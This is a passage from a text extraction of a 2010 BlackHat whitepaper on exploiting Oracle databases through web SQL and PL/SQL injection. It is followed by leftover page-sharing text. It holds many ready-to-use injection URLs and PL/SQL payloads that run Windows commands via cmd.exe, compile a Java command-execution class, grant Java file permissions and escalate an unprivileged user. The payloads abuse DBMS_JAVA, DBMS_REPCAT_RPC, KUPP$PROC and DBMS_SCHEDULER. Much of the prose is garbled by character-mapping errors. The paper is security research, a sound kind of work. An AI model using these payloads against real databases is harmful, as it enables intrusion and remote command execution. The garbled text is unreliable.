5--,$0,J 7P60,/4 11g 81, 11g 82 (0 day aL Lhe Llme of wrlLlng)
http://192.168.2.10/ora8.php?name=SCOTT and (SELECT
DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper
c:\\windows\\system32\\cmd.exe /c dir>C:\\OUT.LST') FROM DUAL) is not null
--

:J 5M8!?TAZA?>/!>4V=@FA##
5--,$0,J 7P60,/: 10g 82, 11g 81, 11g 82 (0 day aL Lhe Llme of wrlLlng)
DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\sy
stem32\\cmd.exe','/c','dir>c:\\OUT2.LST') FROM DUAL) is not null

1he llsL of [ava permlsslons avallable Lo Lhe user can be obLalned by lssulng Lhe followlng query:
select * from user_java_policy where grantee_name ='SCOTT'
R4 S+*N !H! O7+P+2(3(9
As noLed under Lhe secLlon rlvlleged SCL ln[ecLlon, when Lhe ln[ecLlon polnL ls ln a procedure
owned by S?S (Au1Plu ueflner), Lhen Lhe aLLacker can use a number of funcLlons for execuLlng
CperaLlng SysLem Commands, lncludlng Lhe 2 Lechnlques menLloned above
(u8MS_LxC81_Lx1LnSlCn, !AvA rlvlleges). Powever, anoLher way Lo achleve Lhls ls by uslng
u8MS_8LCA1_8C.vALluA1L_8LMC1L_8C. As noLed earller, Lhls was flxed ln !anuary 2009 by
Cracle.

16 7Safe LlmlLed

5M8!?B/OFA>?BOF4ZA#%5A>/?B/8E>/?BF
5--,$0,J Q,*6&.'6: Cracle 8, 9,10g 81, 10g 82, 11g 81 (llxed ln Cu !uly 2009)
E*&F&+,(, *,RK&*,J: S?S
C,6$*&B0&.': As noLed earller Lhls funcLlon ls noL avallable Lo 'publlc' and can only be execuLed by S?S
user. Pence only a SCL ln[ecLlon ln a procedure owned by S?S can call Lhls funcLlon. As Lhls funcLlon
ls vulnerable Lo L/SCL ln[ecLlon, lL can be used Lo execuLe CS code by a number of meLhods such as:
CreaLlng !AvA Llbrary(unlversal, LxcepL xL)
u8MS_SCPLuuLL8 (unlversal)
LxLproc (Cnly 10g 81)
L/SCL naLlve make uLlllLy (9l only)
S+*N '6P6
Cieate Libiaiy:
SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:ca
non_gname);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN
EXECUTE IMMEDIATE ''''create or replace and compile java source named
"LinxUtil" as import java.io.*; public class LinxUtil extends Object
{public static String runCMD(String args) {try{BufferedReader myReader= new
BufferedReader(new InputStreamReader(
Runtime.getRuntime().exec(args).getInputStream() ) ); String
stemp,str="";while ((stemp = myReader.readLine()) != null) str
+=stemp+"\n";myReader.close();return str;} catch (Exception e){return
e.toString();}}public static String readFile(String
filename){try{BufferedReader myReader= new BufferedReader(new
FileReader(filename)); String stemp,str="";while ((stemp =
myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return
str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--
','CCCCC') from dual) is not null--
uianting }AvA peimissions:
EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(
''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''',
''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--
','CCCCC') from dual) is not null --

Cieating Function:
EXECUTE IMMEDIATE ''''create or replace function LinxRunCMD(p_cmd in
varchar2) return varchar2 as language java name

17 7Safe LlmlLed

''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';
'''';END;'';END;--','CCCCC') from dual) is not null --
Naking function executable by P0BLIC
EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--
','CCCCC') from dual) is not null --
Executing 0S Coue:
sys.LinxRunCMD('cmd.exe /c whoami ') from dual) is not null --

O..+4 8sqlbf lncorporaLes Lhls explolL
W4 S+*N 5MA O7+P+2(3(9
lf Lhe ln[ecLlon polnL ls such LhaL Lhe aLLacker's query geLs execuLed wlLh u8A prlvlleges Lhen he can
use Lhls funcLlon Lo execuLe CS code.
!H!4[=OO\OBEF4FB/A>/?8A!>/B?OBEF/!!
5--,$0,J Q,*6&.'64 11g 81 and 82 (0day aL Lhe Llme of wrlLlng)
E*&F&+,(, *,RK&*,J4 DBA
2

C,6$*&B0&.': While the vALluA1L_8LMC1L_8C was flxed by Cracle ln !uly 2009,
u8MS_LxC81_Lx1LnSlCn ln 2006 and u8MS_!AvA (u8MS_!AvA_1LS1) wlll be flxed soon, Lhls one
ls sLlll un-paLched and works on 11g (81 and 82). As noLed earller, Lhe L/SCL execuLlon from Lhls
funcLlon ls a S-,#0K*,T and noL a bug. Pence, lf Cracle does noL paLch/remove Lhls funcLlon, Lhls may
be one unlversal way for execuLlng CS code when explolLlng SCL ln[ecLlon from web (ln[ecLlon polnL
ln procedure owned by user havlng u8A role). As l have already shown CS code execuLlon by !ava,
leL's Lake a dlfferenL approach Lhls Llme. 1he example below shows CS code execuLlon based on
u8MS_SCPLuuLL8 (all oracle verslons, lncludlng xL):

5M8!?!FD/5=#/B
Cieate piogiam
http://192.168.2.10/ora6.php?name=SCOTT' and (selecL
S?S.ku$8CC.C8LA1L_MAS1L8_8CCLSS('u8MS_SCPLuuLL8.creaLe_program(''myprog4'',''LxLC
u1A8LL'',''c:\WlnuCWS\sysLem32\cmd.exe /c dlr >> c:\my4.LxL'',0,18uL),') from dual) ls noL null --
Cieate }ob
http://192.168.2.10/ora6.php?name=SCOTT' and (selecL
S?S.ku$8CC.C8LA1L_MAS1L8_8CCLSS('u8MS_SCPLuuLL8.creaLe_[ob([ob_name =>

2
unllke vALluA1L_8LMC1L_8C, Lhls funcLlon can be execuLed by any user who has u8A role

18 7Safe LlmlLed

''my[ob4'',program_name => ''myprog4'',sLarL_daLe => nuLL,repeaL_lnLerval => nuLL,end_daLe =>
nuLL,enabled => 18uL,auLo_drop => 18uL),') from dual) ls noL null --
Remove }ob (Not Requiieu)
http://192.168.2.10/ora6.php?name=SCOTT' and (select
SYS.KUPP$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.drop_program(PROGRAM_NA
ME => ''myprog'');') from dual) is not null --
O#]!"# %&'()*+,&
ln Cracle Lhere ls anoLher class of vulnerablllLy whlch ls slmllar Lo SCL ln[ecLlon buL more dangerous.
1hls happens when unsanlLlsed user's lnpuL ls used ln consLrucLlon of an anonymous L/SCL block
whlch Lhen geLs dynamlcally execuLed.
LeL's look aL one such example:
CREATE OR REPLACE PROCEDURE SCOTT.TEST( Q IN VARCHAR2) AS
BEGIN
EXECUTE IMMEDIATE ('BEGIN '||Q||';END;');
END;
1he followlng php scrlpL (ora9.php) calls Lhls procedure:
<?php

$sql = 'BEGIN scott.test(:name); END;';




oci_execute($stmt);
?>
ln Lhls example Lhe vulnerable procedure ls owned by SCC11 (hence unprlvlleged). AlLhough Cracle
does noL supporL nesLed query ln SCL, lL does so ln L/SCL. Pence explolLlng Lhls ls qulLe
sLralghLforward.
O7+P+2(3( /9)626*+,&
WhaLever we ln[ecL wlLhln Lhls L/SCL ln[ecLlon, lL wlll geL execuLed elLher wlLh Lhe prlvlleges of Lhe
procedure owner or lnvoker (Au1Plu uLllnL8 or Cu88Ln1_uSL8 respecLlvely deflned wlLhln
vulnerable procedure). Powever, as now we can lssue nesLed querles, Lhen we can explolL Lhe
vulnerable packages held wlLhln Lhe back-end daLabase Lo escalaLe prlvlleges. uavld LlLchfleld

19 7Safe LlmlLed

recenLly showed a 0 day by whlch a user wlLh [usL C8LA1L SLSSlCn prlvlleges can become u8A
(applles Lo 10g 82, 11g 81, 11g 82), so leL's use Lhe same aLLack vecLor Lo explolL Lhls vulnerablllLy
and flrsL granL our user [ava lC prlvlleges.
http://192.168.2.10/ora9.php?name=NULL; execute immediate 'DECLARE POL
DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; CURSOR C1 IS SELECT
''GRANT'',user(),''SYS'',''java.io.FilePermission'',''<<ALL
FILES>>'',''execute'',''ENABLED'' FROM DUAL;BEGIN OPEN C1; FETCH C1 BULK
COLLECT INTO POL;CLOSE
C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;';end;--

1hls wlll granL !ava prlvlleges Lo our SCC11 user (only creaLe sesslon prlvlleges are requlred). WlLh
Lhese prlvlleges we can become u8A (lf we wanL) or [usL dlrecLly execuLe CperaLlng SysLem
Commands.
E! F,;( /0()L*+,&
http://192.168.2.10/ora9.php?name=null;declare aa varchar2(200);begin
execute immediate 'Select
DBMS_JAVA_TEST.FUNCALL(''oracle/aurora/util/Wrapper'',''main'',''c:\\window
s\\system32\\cmd.exe'',''/c'',''dir >> c:\\OUTer3.LST'') FROM DUAL' into
aa;end;end;--
B(X(7(&)(9
1. hLLp://www.daLabasesecurlLy.com/PacklngAurora.pdf
2. hLLp://www.daLabasesecurlLy.com/LxplolLlngLSCLlnCracle11g.pdf
3. hLLp://www.daLabasesecurlLy.com/oracle/plsql-ln[ecLlon-creaLe-sesslon.pdf
4. hLLp://blog.phlshme.com/wp-conLenL/uploads/2007/08/dc-13-karlsson.pdf
3. hLLp://blog.red-daLabase-securlLy.com/2009/01/17/LuLorlal-oracle-sql-ln[ecLlon-ln-webapps-
parL-l/
6. hLLp://noLsosecure.com/folder2/ora_cmd_exec.LxL
7. hLLp://code.google.com/p/bsqlbf-v2/
8. hLLp://sqlmap.sourceforge.neL/
9. hLLp://www.neL-securlLy.org/dl/arLlcles/more_advanced_sql_ln[ecLlon.pdf
10. hLLp://www.defcon.org/lmages/defcon-16/dc16-presenLaLlons/defcon-16-alonso-
parada.pdf
11. hLLp://www.red-daLabase-securlLy.com/wp/confldence2009.pdf
12. hLLp://www.slavlks-blog.com/2009/10/13/bllnd-sql-ln[ecLlon-ln-oracle/

A:,L* *N( 6L*N,7
SumlL SlddharLh (Sld) works as a prlnclpal securlLy consulLanL for 7Safe where he heads Lhe
eneLraLlon 1esLlng deparLmenL. Pe speclallses ln appllcaLlon and daLabase securlLy and has been a
speaker aL many securlLy conferences lncludlng uefcon, 1roopers, CWAS Appsec, Sec-1 eLc. Pe also
runs Lhe popular l1 securlLy blog hLLp://www.noLsosecure.com

BlackHat USA 2010 Siddharth Hacking Oracle From The Web WP

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

BlackHat USA 2010 Siddharth Hacking Oracle From The Web WP

Uploaded by

Copyright:

Available Formats

1 7Safe LlmlLed

You might also like